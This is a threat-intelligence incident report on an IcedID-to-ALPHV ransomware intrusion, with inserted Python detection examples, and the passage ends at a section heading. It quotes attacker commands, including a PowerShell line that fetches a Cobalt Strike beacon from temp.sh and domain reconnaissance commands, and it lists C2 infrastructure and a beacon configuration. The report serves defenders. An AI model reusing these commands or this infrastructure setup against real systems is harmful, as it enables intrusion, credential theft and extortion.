IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Key Takeaways

  • In October 2023, we observed an intrusion that began with a spam campaign distributing a forked IcedID loader.
  • The threat actor used Impacket’s wmiexec and RDP to install ScreenConnect on multiple systems, enabling them to execute various commands and deploy Cobalt Strike beacons.
  • Their toolkit also included CSharp Streamer, a RAT written in C# with numerous functionalities, as documented here.
  • The attacker used a custom tool to stage data and exfiltrated it using Rclone.
  • Eight days after initial access, ALPHV ransomware was deployed across all domain-joined Windows systems.

An audio version of this report can be found on Spotify, Apple, YouTube, Audible, and Amazon.

The DFIR Report Services

→ Click here to access the DFIR Lab related to this report ←

Five new Sigma rules were created from this report and added to our Private Sigma Rules.

Our Threat Feed was tracking the Cobalt Strike server used in this case days before the intrusion began.

  • Private Threat Briefs: Over 25 private reports annually, such as this one but more concise and quickly published post-intrusion.
  • Threat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc.
  • All Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, long-term tracking, data clustering, and other curated intel.
  • Private Sigma Ruleset: Features 100+ Sigma rules derived from 40+ cases, mapped to ATT&CK with test examples.
  • DFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions. Interactive labs are available with different difficulty levels and can be accessed on-demand, accommodating various learning speeds.

Contact us today for a demo!


Case Summary

This intrusion began in October 2023 with a malicious email that enticed the recipient to download a zip archive containing a Visual Basic Script (VBS) and a benign README file. We assess with high confidence that this email was part of a spam campaign delivering a forked variant of IcedID. First reported by ProofPoint in February 2023, this forked IcedID variant lacks banking functionality and prioritizes payload delivery. Upon user interaction with the archive’s contents, the VBS file was executed, initiating the embedded forked IcedID loader.

This was followed by the creation of a scheduled task to maintain persistence on the beachhead. The forked IcedID loader then communicated with a command and control server, leading to the dropping and execution of another IcedID DLL. Approximately two minutes after execution, the first round of discovery was observed using Windows native binaries, mirroring the activity seen in previously reported IcedID cases.

Around two hours into the intrusion, the threat actor installed ScreenConnect on the beachhead using a renamed installer binary, “toovey.exe.” They executed multiple commands on the host via ScreenConnect. These commands included Windows utilities such as nltest and net for reconnaissance. They also used PowerShell cradles, bitsadmin, and certutil to attempt retrieval of Cobalt Strike beacons on the beachhead. They had a few stumbles while trying to download the Cobalt Strike beacons using temp.sh, resulting in downloading the HTML of the website rather than their intended payload file.

Once the Cobalt Strike beacons were executed, they established communication with the Cobalt Strike command and control server. Within 20 minutes of this activity, a new payload, cslite.exe (CSharp Streamer C2), was dropped on the beachhead. CSharp Streamer is a multi-function remote access trojan that was first reported in 2021. During this intrusion, it was first used to access the LSASS process on the beachhead for credential access; and around 40 minutes after that, the threat actor performed a dcsync operation from the beachhead host to one of the domain controllers. The threat actor then copied a renamed ScreenConnect installer from the beachhead to a domain controller over SMB. The installation was completed using Impacket’s wmiexec script to remotely run the ScreenConnect installer.

After installing ScreenConnect, we observed a log in to the domain controller using ScreenConnect to access the host. During this session, the threat actor dropped several CSharp Streamer payloads. Although they executed the files, we did not observe any network traffic to a command and control server at that time. Activity then ceased for approximately eight hours.

On the second day, the threat actor returned and performed network discovery on the domain controller using SoftPerfect’s network scanner. They then initiated an RDP connection from the domain controller to a backup server. The threat actor reviewed backups and running processes before dropping both a CSharp Streamer binary and a previously used ScreenConnect installer. These were then executed over the RDP session. Next, a Cobalt Strike beacon was run, and LSASS was accessed on the host.

Around eleven hours later, the threat actor dropped several Cobalt Strike beacons and attempted to execute them; however, no new command and control traffic was observed. The threat actor quickly removed the files. Four hours later, another ScreenConnect installer was dropped on the backup server and executed using wmiexec. A new RDP connection was then initiated to a second domain controller, and netscan was run again. Following this, ScreenConnect was installed on the second domain controller, and an RDP session was started from this domain controller to a file server. On the file server, both a Cobalt Strike beacon and the ScreenConnect installer were dropped and executed via the RDP session.

After three days of no significant activity, the threat actor returned. They dropped and executed a new ScreenConnect installer on the backup server via wmiexec and ran netscan again. Using RDP, they connected to the file server and used Mozilla Firefox to preview a few financial documents before running netscan there as well.

The following day, a custom tool named “confucius_cpp” was dropped on the file server. Its functionalities included aggregation, staging, and compression of sensitive files. We observed the threat actor performing Google searches for the keyword “rclone” and subsequently downloading the rclone application on the file server. Instead of direct execution, the Rclone binary was started using a VBS script. Upon execution of this script, the previously staged data was successfully exfiltrated using Rclone to a remote server.

On day seven of the intrusion, an RDP connection was initiated from the beachhead to the backup server and the file server using CSharp Streamer. New ScreenConnect installers appeared yet again and followed the same WMI execution pattern as before.

On the final day of the intrusion, the threat actor proceeded to push toward their final objectives. From the backup server, they ran a fresh netscan sweep and began staging both a ScreenConnect installer and an ALPHV ransomware binary. First, they used xcopy to stage the ScreenConnect installer across all Windows hosts in the domain and then executed it using a WMI command. This was then repeated for the ALPHV ransomware payload. During the execution, we observed the threat actor deleting all the backups interactively. Upon completion of the ransomware execution, a ransom note was left behind on the hosts. The time to ransomware (TTR) was around 180 hours, over the course of 8 days.

If you would like to get an email when we publish a new report, please subscribe here.

Analysts

Analysis and reporting completed by @yatinwad and UC2.

Initial Access

Initial access began with a malicious e-mail. The malicious spam campaign can be linked to a publicly reported campaign from @JAMESWT_MHT encouraging victims to download and open a ZIP archive.


Once the ZIP file was extracted, the user was presented with a Readme and a Visual Basic Script (VBS) file.


WScript.exe was called when executing the script, which starts the infection.


The script embeds a base64-encoded DLL in a slightly obfuscated form, saves it to C:\Windows\Temp\0370-1.dll and then executes that DLL through regsvr32.


This DLL is an IcedID loader as observed with sandboxing here. The infection chain was concluded by the loader dropping and executing another IcedID DLL via rundll32.


Execution

ScreenConnect

Once IcedID was operational, the threat actor used it to install the RMM tool ScreenConnect, renamed as toovey.exe.


Throughout the intrusion, the threat actor dropped several more renamed ScreenConnect installers, usually after moving laterally to a new host, and then executed them through Impacket’s wmiexec.py script:


Besides execution with wmiexec.py, some installers were executed during the threat actor’s RDP sessions:


ScreenConnect was then used to execute various commands. This can be observed in logs, as ScreenConnect drops the desired script on disk, followed by the corresponding interpreter, as discussed in a previous report. This can be seen in various events, such as Security Event ID 4688 or Sysmon Event 1, as displayed below.


Cobalt Strike

As in most intrusions we document, Cobalt Strike beacons were used in this intrusion. On the beachhead host, using ScreenConnect, the threat actor tried to download malicious Cobalt Strike beacons using bitsadmin, without success.


Besides process creation event logs, bitsadmin downloads can also be detected via event IDs 59 and 60 of the “Microsoft-Windows-Bits-Client/Operational” log.


Following this failure, they used another LOLBin named certutil to download their payloads, again via ScreenConnect. This behavior was repeated to download other Cobalt Strike beacons.


PowerShell was another tool used to retrieve Cobalt Strike beacons, again with some failures, and yet again using ScreenConnect.


In addition to the previously mentioned methods of retrieving additional payloads, there was another instance where the attackers used temp.sh to host their malware. However, a failure occurs when attempting to directly download a file from these links. Instead of obtaining the actual file, users end up downloading an HTML presentation page that prompts them to click a link to retrieve the file.

powershell Invoke-WebRequest "http://temp.sh/VSlAV/http64.exe" -OutFile C:\programdata\rr.exe

On other occasions, PowerShell usage was successful, and in those cases Sysmon events let us trace child processes via the PowerShell ParentCommandLine. For instance, the following shows a payload used to launch https64.dll, another Cobalt Strike beacon.


Because the beacon was using plain HTTP, the retrieved PowerShell payload can be extracted from the network communications.


As documented in Cobalt Strike, a Defender’s Guide part 1 and part 2, the attackers used Cobalt Strike’s default pipe names, which can be easily detected.


Impacket

As part of their toolkit, the threat actor used Impacket’s wmiexec.py script to perform actions. This activity can be easily observed in logs because of the default redirect of its output to \\127.0.0.1\ADMIN$\__%timestamp% (as visible in the source code).
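As an added example (not part of the original report), the following Python flags process creation records that carry the wmiexec output redirect described above. The hosts and command lines are constructed; the ScreenConnect client path is assumed to follow the product's usual install layout.

```python
import re

# Impacket's wmiexec.py, by default, wraps every command so that its output is
# written to the ADMIN$ share over loopback under a name of "__" plus a Unix
# timestamp, e.g.:
#   cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1698840000.12 2>&1
# The regex keys on that redirect. Caveat: the script's -nooutput option skips
# the redirect entirely, so the WmiPrvSE.exe parent check below still matters.
WMIEXEC_REDIRECT = re.compile(
    r"""1>\s*\\\\127\.0\.0\.1\\ADMIN\$\\__\d+(?:\.\d+)?\s+2>&1""",
    re.IGNORECASE,
)

# Constructed Sysmon Event ID 1 / Security 4688 style records (not case data).
SAMPLE_EVENTS = [
    {"host": "DC01", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmd": r'cmd.exe /Q /c C:\ProgramData\toovey.exe 1> \\127.0.0.1\ADMIN$\__1698840000.12 2>&1'},
    {"host": "DC01", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmd": r'cmd.exe /Q /c net group "domain admins" /domain 1> \\127.0.0.1\ADMIN$\__1698840055.93 2>&1'},
    # Ordinary local redirect: same shape, but not to the loopback ADMIN$ share.
    {"host": "FS01", "parent": r"C:\Windows\explorer.exe",
     "cmd": r'cmd.exe /c dir C:\Shares 1> C:\Temp\out.txt 2>&1'},
    # Service start of a ScreenConnect client (assumed path layout), no redirect.
    {"host": "FS01", "parent": r"C:\Windows\System32\services.exe",
     "cmd": r'"C:\Program Files (x86)\ScreenConnect Client (1a2b3c4d5e6f7a8b)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest"'},
]


def is_wmiexec(cmd):
    """True when the command line carries wmiexec's default output redirect."""
    return bool(WMIEXEC_REDIRECT.search(cmd))


def find_wmiexec(events):
    """Return one hit per matching record, noting whether WMI spawned it."""
    hits = []
    for ev in events:
        if not is_wmiexec(ev["cmd"]):
            continue
        # Commands launched through the Win32_Process WMI class are children of
        # WmiPrvSE.exe; a redirect without that parent is still worth a look.
        parent_is_wmi = ev["parent"].lower().endswith("\\wmiprvse.exe")
        hits.append({"host": ev["host"], "cmd": ev["cmd"],
                     "parent_is_wmiprvse": parent_is_wmi})
    return hits


if __name__ == "__main__":
    for hit in find_wmiexec(SAMPLE_EVENTS):
        print(hit["host"], "wmiexec:", hit["cmd"])
```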


CSharp Streamer

During the intrusion, the threat actor deployed a binary named “cslite.exe” on the beachhead host. Upon investigation, we identified this binary as a RAT known as CSharp Streamer, thanks to an excellent write-up by Hendrik Eckardt. This malware combines many different functions and is a very capable remote access trojan. During this intrusion, we observed it dumping credentials, proxying RDP traffic, and providing command and control communications for the threat actor.

We were able to confirm the tool using memory analysis, identifying known functions and commands from the previously linked report.


When executed, the tool writes a .NET executable to the %USERPROFILE%\AppData\Local\Temp folder using a .tmp extension and then loads it into memory, as seen in the Sysmon Event ID 7 event:


Using dynamic analysis from running the sample in a malware analysis sandbox, we can observe the injected .NET assemblies:


Persistence

IcedID

IcedID registered a scheduled task for persistence, in the same manner as documented in several other reports.


The task was registered to be executed every hour after logon as indicated respectively by the following XML tags:

<Interval>PT1H</Interval>
<LogonTrigger id="LogonTrigger"><Enabled>true</Enabled></LogonTrigger>

ScreenConnect

Upon installation, ScreenConnect persists across reboots with an auto-start service. This can be seen using the built-in System event logs (event ID 7045).


Should the System event logs be unavailable (for instance, if cleared by a threat actor), the service configuration is also saved inside the SYSTEM registry hive under HKLM\CurrentControlSet\Services\, which can be analyzed using Eric Zimmerman’s Registry Explorer tool.


Anomali Threat Research explained the parameters in their article:

  • e as the session type, which can be SupportMeetingAccess.
  • y as the process type, which can be Guest or Host.
  • h as the URI of the relay service.
  • p as the relay service’s port.
  • s as a globally unique identifier for client identification.
  • k as the encoded encryption key, used for identity verification.
  • t as the optional session name.

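To make those parameters actionable, here is an added Python example (not from the report or from Anomali) that pulls them out of a 7045 service ImagePath and checks the relay host against an allowlist. The ImagePath samples, the relay hosts and the APPROVED_RELAYS set are constructed assumptions; the client path layout is assumed to follow ScreenConnect's usual install directory.

```python
import re
from urllib.parse import parse_qs

# Parameter letters as documented by Anomali, mapped to readable names.
PARAM_NAMES = {
    "e": "session_type",    # e.g. Access or SupportMeetingAccess
    "y": "process_type",    # Guest or Host
    "h": "relay_host",      # relay service URI
    "p": "relay_port",
    "s": "session_id",      # client GUID
    "k": "encryption_key",  # encoded key for identity verification
    "t": "session_name",    # optional
}

# Assumed: the relays the organisation's own ScreenConnect deployment uses.
APPROVED_RELAYS = {"helpdesk-relay.example.internal"}

# The client service is installed with a second quoted argument that starts
# with "?" and carries the parameters as a query string.
_QUERY_ARG = re.compile(r'"\?([^"]*)"')

# Constructed 7045 ImagePath values, not taken from the case.
SUSPECT_IMAGE_PATH = (
    r'"C:\Program Files (x86)\ScreenConnect Client (1a2b3c4d5e6f7a8b)\ScreenConnect.ClientService.exe" '
    r'"?e=Access&y=Guest&h=instance-abcd12-relay.screenconnect.com&p=443'
    r'&s=5f9c3b8a-1234-4c9d-8e7f-0a1b2c3d4e5f&k=CONSTRUCTED_KEY&t=support"'
)
APPROVED_IMAGE_PATH = (
    r'"C:\Program Files (x86)\ScreenConnect Client (0f0e0d0c0b0a0908)\ScreenConnect.ClientService.exe" '
    r'"?e=Access&y=Guest&h=helpdesk-relay.example.internal&p=8041'
    r'&s=0c1d2e3f-4a5b-4c6d-8e7f-90a1b2c3d4e5&k=CONSTRUCTED_KEY&t="'
)


def parse_screenconnect_service(image_path):
    """Return the named ScreenConnect client parameters, or None if absent."""
    match = _QUERY_ARG.search(image_path)
    if match is None:
        return None
    query = parse_qs(match.group(1), keep_blank_values=True)
    return {name: query.get(letter, [""])[0] for letter, name in PARAM_NAMES.items()}


def classify(image_path, approved_relays=APPROVED_RELAYS):
    """Parse the service path and mark whether its relay host is approved."""
    info = parse_screenconnect_service(image_path)
    if info is None:
        return None
    host = info["relay_host"].lower()
    info["approved"] = host in {r.lower() for r in approved_relays}
    # Vendor-hosted relays are common for attacker-controlled trial instances;
    # recording it helps triage but is not proof of malice on its own.
    info["vendor_hosted"] = host.endswith(".screenconnect.com")
    return info


if __name__ == "__main__":
    for path in (SUSPECT_IMAGE_PATH, APPROVED_IMAGE_PATH):
        print(classify(path))
```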

Defense Evasion

After the threat actor moved laterally to a backup server, we observed Cobalt Strike injection into the legitimate processes “winlogon.exe” and “rundll32.exe”.


Memory captures give defenders additional detection options. Here, by processing the acquired memory with MemProcFS and running its findevil command, we can find an injected beacon in winlogon.exe.


During the intrusion, the threat actor deleted the renamed ScreenConnect installers from the backup server and the file server using the “del” command, in an attempt to cover their tracks.


Credential Access

Credentials were extracted from LSASS (Local Security Authority Subsystem), a technique commonly seen during similar intrusions. On day one, through hands-on activity, the threat actor executed cslite.exe (a CSharp Streamer file dropped on the Desktop of a compromised user), which was used to access the LSASS process. Process access can be seen using Sysmon event ID 10, as displayed below.


Microsoft documented the granted accesses, which are the following:

  • 0x1010: PROCESS_QUERY_LIMITED_INFORMATION (0x1000) and PROCESS_VM_READ (0x0010)
  • 0x1FFFFF: PROCESS_ALL_ACCESS

Another data point to look for is the UNKNOWN string in the CallTrace, which indicates that Sysmon was not able to resolve the address of the code from which the OpenProcess function was called, a potential indication of an in-memory DLL.

We were also able to collect memory and scan it with various YARA rules, confirming the use of a Mimikatz implementation with several rule hits for the cslite.exe memory space and file:


In another instance, we saw LSASS being accessed by WerFault.exe, with PROCESS_ALL_ACCESS granted. This should rarely happen in a production environment, and once again the CallTrace can help: call traces involving ntdll.dll, dbghelp.dll or dbgcore.dll (source 1, source 2) should be monitored.


Finally, on the second day, we can see yet another access to LSASS, this time from rundll32.exe, once again using access 0x1010 and with UNKNOWN in the CallTrace. This time, rundll32.exe was spawned by PowerShell, which was tasked to download and execute a Cobalt Strike beacon.
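The three LSASS accesses above share a small set of traits (the granted-access mask, UNKNOWN frames, and minidump DLLs in the CallTrace). As an added example that is not part of the report, the following Python scores Sysmon Event ID 10 records on exactly those traits; the event records are constructed to mirror the accesses described here plus one benign access, and the source image paths are assumptions.

```python
# Access rights documented by Microsoft and quoted in this report.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
PROCESS_ALL_ACCESS = 0x1FFFFF
# DLLs whose presence in a CallTrace points at the MiniDumpWriteDump path.
MINIDUMP_DLLS = ("dbghelp.dll", "dbgcore.dll")

# Constructed Sysmon Event ID 10 records (field names per Sysmon's schema).
SAMPLE_EVENTS = [
    {"SourceImage": r"C:\Users\user\Desktop\cslite.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d534|UNKNOWN(00007FF8A1B2C3D4)|UNKNOWN(00007FF8A1B2D000)"},
    {"SourceImage": r"C:\Windows\System32\WerFault.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1FFFFF",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d534|C:\Windows\System32\dbgcore.dll+12f3a|C:\Windows\System32\WerFault.exe+4c21"},
    {"SourceImage": r"C:\Windows\System32\rundll32.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d534|C:\Windows\System32\KERNELBASE.dll+2a7c6|UNKNOWN(000001F2C3B40A12)"},
    # Benign: query-only access, every frame resolved to a module on disk.
    {"SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1000",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d534|C:\Windows\System32\KERNELBASE.dll+2a7c6|C:\Program Files\Windows Defender\MsMpEng.exe+1a2b3"},
]


def decode_access(mask_hex):
    """Name the rights in a GrantedAccess value (only the ones this report uses)."""
    mask = int(mask_hex, 16)
    if mask == PROCESS_ALL_ACCESS:
        return ["PROCESS_ALL_ACCESS"]
    names = []
    if mask & PROCESS_QUERY_LIMITED_INFORMATION:
        names.append("PROCESS_QUERY_LIMITED_INFORMATION")
    if mask & PROCESS_VM_READ:
        names.append("PROCESS_VM_READ")
    return names


def lsass_access_findings(event):
    """Return the suspicious traits of one Event ID 10 record ([] = nothing notable)."""
    if not event["TargetImage"].lower().endswith("\\lsass.exe"):
        return []
    mask = int(event["GrantedAccess"], 16)
    frames = [f for f in event["CallTrace"].split("|") if f]
    findings = []
    if mask == PROCESS_ALL_ACCESS:
        findings.append("all_access")
    elif mask & PROCESS_VM_READ:
        # Reading LSASS memory is the trait that matters; query-only is routine.
        findings.append("vm_read")
    if any(f.upper().startswith("UNKNOWN") for f in frames):
        findings.append("unknown_frame")
    if any(d in f.lower() for f in frames for d in MINIDUMP_DLLS):
        findings.append("minidump_dll")
    return findings


def triage(events):
    """(SourceImage, findings) for every record that has at least one finding."""
    out = []
    for ev in events:
        findings = lsass_access_findings(ev)
        if findings:
            out.append((ev["SourceImage"], findings))
    return out


if __name__ == "__main__":
    for source, findings in triage(SAMPLE_EVENTS):
        print(f"{source}: {', '.join(findings)}")
```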

Around 40 minutes after the LSASS dump by the “cslite.exe” executable, we observed a traffic spike from the beachhead host to a domain controller. Reviewing this network traffic using the Suricata rules from Didier Stevens, we discovered potential Mimikatz dcsync activity between the hosts.


At the same time we found Event ID 4662 logs on the domain controller, confirming a sync operation requested by the “Administrator” account:


Specifically, to detect this dcsync activity we were looking for the Domain-DNS class (object) schema GUID 19195a5b-6da0-11d0-afd3-00c04fd930c9 together with the DS-Replication-Get-Changes-All schema GUID 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2, as explained in this SpecterOps post. Using these two points of evidence, we can say with good confidence that the threat actor performed a dcsync operation.
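As an added example (not part of the report), the following Python applies that two-GUID check to Event ID 4662 records and separates legitimate domain controller replication from a request made by a user account. The records are constructed; the domain name, account names and the ObjectName GUID are assumptions.

```python
import re

# Schema GUIDs named in this report (see the SpecterOps post referenced above).
DOMAIN_DNS_CLASS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"

_GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.IGNORECASE)

# Constructed 4662 records; ObjectType and Properties use the "%{guid}" and
# "%%7688" (Control Access) encoding the Security log uses for these fields.
_REPL_PROPERTIES = ("%%7688\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
                    "\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}")
SAMPLE_4662 = [
    {"EventID": 4662, "SubjectUserName": "Administrator", "SubjectDomainName": "CORP",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "ObjectName": "%{0a1b2c3d-0000-4000-8000-000000000001}",
     "Properties": _REPL_PROPERTIES, "AccessMask": "0x100"},
    {"EventID": 4662, "SubjectUserName": "DC02$", "SubjectDomainName": "CORP",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "ObjectName": "%{0a1b2c3d-0000-4000-8000-000000000001}",
     "Properties": _REPL_PROPERTIES, "AccessMask": "0x100"},
    # Unrelated object access by a user: a constructed, non-domain class GUID.
    {"EventID": 4662, "SubjectUserName": "jdoe", "SubjectDomainName": "CORP",
     "ObjectType": "%{00000000-1111-4222-8333-444444444444}",
     "ObjectName": "%{0a1b2c3d-0000-4000-8000-000000000002}",
     "Properties": "%%7688\n\t{00000000-1111-4222-8333-444444444444}",
     "AccessMask": "0x100"},
]


def guids_in(text):
    """All GUIDs in a field, lower-cased so comparisons ignore log casing."""
    return {g.lower() for g in _GUID_RE.findall(text)}


def is_replication_request(event):
    """Both GUIDs from the report present: a directory replication request."""
    return (event.get("EventID") == 4662
            and DOMAIN_DNS_CLASS in guids_in(event["ObjectType"])
            and DS_REPLICATION_GET_CHANGES_ALL in guids_in(event["Properties"]))


def is_dcsync(event, dc_accounts=frozenset()):
    """A replication request not made by a known domain controller account."""
    if not is_replication_request(event):
        return False
    subject = event["SubjectUserName"]
    known_dcs = {a.upper() for a in dc_accounts}
    # DCs replicate with their machine accounts ("NAME$"); anything else,
    # including an ordinary user such as the report's "Administrator", is a hit.
    return not (subject.endswith("$") and subject.upper() in known_dcs)


def dcsync_hits(events, dc_accounts=frozenset()):
    return [e["SubjectUserName"] for e in events if is_dcsync(e, dc_accounts)]


if __name__ == "__main__":
    print(dcsync_hits(SAMPLE_4662, {"DC01$", "DC02$"}))
```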

Discovery

Minutes after the initial compromise, a first round of discovery was observed using native Windows built-in utilities, spawning from the IcedID malware.

cmd.exe /c chcp >&2
ipconfig /all
systeminfo
net config workstation
nltest /domain_trusts
nltest /domain_trusts /all_trusts
net view /all /domain
net view /all
net group "Domain Admins" /domain

Later on, the threat actor used ScreenConnect on several occasions to run other discovery commands:


nltest  /dclist:
net  group "domain admins" /domain
net  group "Domain Computers" /domain
net  group "domain admins" /domain
net  group "enterprise admins" /domain
nltest  /dclist:
net  group "domain admins" /domain
quser
ipconfig  /all
net  group "domain computers" /domain
systeminfo
route  print
nltest  /dclist:

On day two, day five, and day eight, the threat actor performed rounds of network discovery using SoftPerfect netscan.


Each time, the scan covered the same IP address space and probed ports 135 (RPC), 445 (SMB) and 3389 (RDP), with a few extra ports related to the Veeam backup solution.


Lateral Movement

The renamed ScreenConnect installer was copied from the beachhead to domain controllers, a backup server, and a file server using SMB. As explained in the execution section, the installer was also executed via Impacket’s wmiexec.py script, which resulted in the ScreenConnect installation. Multiple commands were executed on the compromised hosts via ScreenConnect command functionality.

Event ID 5145 logs:


RDP was used extensively during the intrusion by the threat actor to move laterally.


While the threat actor most frequently used the native Windows RDP clients, on at least one occasion they proxied their RDP session via the CSharp Streamer.


When doing this, they left a trace of their remote host name logged under Event ID 4778:

77724F2


Collection

Before initiating the exfiltration process, a custom tool called confucius_cpp.exe was dropped on a file server. This tool was used to aggregate, stage, and compress sensitive data files, using LDAP and creating multiple ZIP archives.


As seen when executing the tool in a lab environment, an LDAP query with the search filter (&(objectClass=computer)) is first made to look for computers, as documented on the Microsoft Learn website.


Once the LDAP query is complete, the tool enumerates shared folders, filtering out some uninteresting folders such as NETLOGON or SYSVOL.


In each selected folder, the tool looks for files matching keywords (in the screenshot, the words security_reports and finance) before compressing the data. This automates the collection phase, ensuring swift action across the whole network.


The attacker also installed Firefox to preview a few documents. This can be seen by looking at the process command line, which contains the URL argument, as displayed below.


Command and Control

The threat actor leveraged the following methods to access the hosts within the network:

  • IcedID
  • Cobalt Strike
  • CSharp Streamer
  • ScreenConnect


IcedID

The forked IcedID loader established a connection to the command and control server modalefastnow[.]com over port 443, which resolved at the time to 212.18.104.12. The contents of the network connection matched a malware rule in the Emerging Threats Open ruleset, “ET MALWARE Win32/IcedID Request Cookie”.

After the initial infection, the second stage IcedID DLL communicated with the following C2 servers:

IP             | Port | Domain              | JA3                                                                | JA3s
173.255.204.62 | 443  | jkbarmossen[.]com   | a0e9f5d64349fb13191bc781f81f42e1                                   | N/A
94.232.46.27   | 443  | evinakortu[.]com    | a0e9f5d64349fb13191bc781f81f42e1, 1138de370e523e824bbca92d049a3777 | N/A
94.232.46.27   | 443  | hofsaalos[.]com     | a0e9f5d64349fb13191bc781f81f42e1, 1138de370e523e824bbca92d049a3777 | N/A
77.105.140.181 | 443  | jerryposter[.]com   | a0e9f5d64349fb13191bc781f81f42e1                                   | ec74a5c51106f0419184d0dd08fb05bc
77.105.142.135 | 443  | skrechelres[.]com   | a0e9f5d64349fb13191bc781f81f42e1                                   | ec74a5c51106f0419184d0dd08fb05bc
212.18.104.12  | 443  | modalefastnow[.]com | a0e9f5d64349fb13191bc781f81f42e1                                   | N/A

ja4: t12d190800_d83cc789557e_7af1ed941c26
ja4: t10d070700_c50f5591e341_c39ab67fec8e
ja4s: t120400_c030_12a20535f9be
ja4x: 96a6439c8f5c_96a6439c8f5c_795797892f9c

Cobalt Strike

The threat actor dropped Cobalt Strike beacons across hosts during the intrusion, communicating with the following IP addresses.

IP | Port | Domain | JA3 | JA3s | AS Organization | ASN | Geolocation Country
85.209.11.48 | 80 | N/A | N/A | N/A | Chang Way Technologies Co. Limited | 57523 | Russia

The DFIR Report Threat Feed tracked this infrastructure as a live Cobalt Strike server from 2023-09-29 through 2023-10-30.

The URIs accessed on 85.209.11.48 are listed under URLs in the Indicators section below.

Using MemProcFS to process a memory image from the backup server, we extracted the minidump of the process injected with Cobalt Strike. From the minidump, the beacon configuration was parsed with 1768.py:

File: minidump.dmp
Config found: xorkey b'.' 0x00000000 0x00010000
0x0001 payload type                     0x0001 0x0002 0 windows-beacon_http-reverse_http
0x0002 port                             0x0001 0x0002 80
0x0003 sleeptime                        0x0002 0x0004 60000
0x0004 maxgetsize                       0x0002 0x0004 1048576
0x0005 jitter                           0x0001 0x0002 0
0x0007 publickey                        0x0003 0x0100 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 Has known private key
0x0008 server,get-uri                   0x0003 0x0100 '85.209.11.48,/load'
0x0043 DNS_STRATEGY                     0x0001 0x0002 0
0x0044 DNS_STRATEGY_ROTATE_SECONDS      0x0002 0x0004 -1
0x0045 DNS_STRATEGY_FAIL_X              0x0002 0x0004 -1
0x0046 DNS_STRATEGY_FAIL_SECONDS        0x0002 0x0004 -1
0x000e SpawnTo                          0x0003 0x0010 (NULL ...)
0x001d spawnto_x86                      0x0003 0x0040 '%windir%\\syswow64\\rundll32.exe'
0x001e spawnto_x64                      0x0003 0x0040 '%windir%\\sysnative\\rundll32.exe'
0x001f CryptoScheme                     0x0001 0x0002 0
0x001a get-verb                         0x0003 0x0010 'GET'
0x001b post-verb                        0x0003 0x0010 'POST'
0x001c HttpPostChunk                    0x0002 0x0004 0
0x0025 license-id                       0x0002 0x0004 1580103824 Stats uniques -> ips/hostnames: 210 publickeys: 92
0x0026 bStageCleanup                    0x0001 0x0002 0
0x0027 bCFGCaution                      0x0001 0x0002 0
0x0009 useragent                        0x0003 0x0100 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BOIE9;ENUS)'
0x000a post-uri                         0x0003 0x0040 '/submit.php'
0x000b Malleable_C2_Instructions        0x0003 0x0100
  Transform Input: [7:Input,4]
   Print
0x000c http_get_header                  0x0003 0x0200
  Build Metadata: [7:Metadata,3,6:Cookie]
   BASE64
   Header Cookie
0x000d http_post_header                 0x0003 0x0200
  Const_header Content-Type: application/octet-stream
  Build SessionId: [7:SessionId,5:id]
   Parameter id
  Build Output: [7:Output,4]
   Print
0x0036 HostHeader                       0x0003 0x0080 (NULL ...)
0x0032 UsesCookies                      0x0001 0x0002 1
0x0023 proxy_type                       0x0001 0x0002 2 IE settings
0x003a TCP_FRAME_HEADER                 0x0003 0x0080 '\x00\x04'
0x0039 SMB_FRAME_HEADER                 0x0003 0x0080 '\x00\x04'
0x0037 EXIT_FUNK                        0x0001 0x0002 1
0x0028 killdate                         0x0002 0x0004 0
0x0029 textSectionEnd                   0x0002 0x0004 0
0x002b process-inject-start-rwx         0x0001 0x0002 64 PAGE_EXECUTE_READWRITE
0x002c process-inject-use-rwx           0x0001 0x0002 64 PAGE_EXECUTE_READWRITE
0x002d process-inject-min_alloc         0x0002 0x0004 0
0x002e process-inject-transform-x86     0x0003 0x0100 (NULL ...)
0x002f process-inject-transform-x64     0x0003 0x0100 (NULL ...)
0x0035 process-inject-stub              0x0003 0x0010 '"+\x8f\'Ûߺ\x8dÝU\x9eì¢~¦H'
0x0033 process-inject-execute           0x0003 0x0080 '\x01\x02\x03\x04'
0x0034 process-inject-allocation-method 0x0001 0x0002 0
0x0000
Guessing Cobalt Strike version: 4.3 (max 0x0046)
Sanity check Cobalt Strike config: OK
Sleep mask 64-bit 4.2 deobfuscation routine found: 0x005e2f3f
Sleep mask 64-bit 4.2 deobfuscation routine found: 0x00624b3f

CSharp Streamer

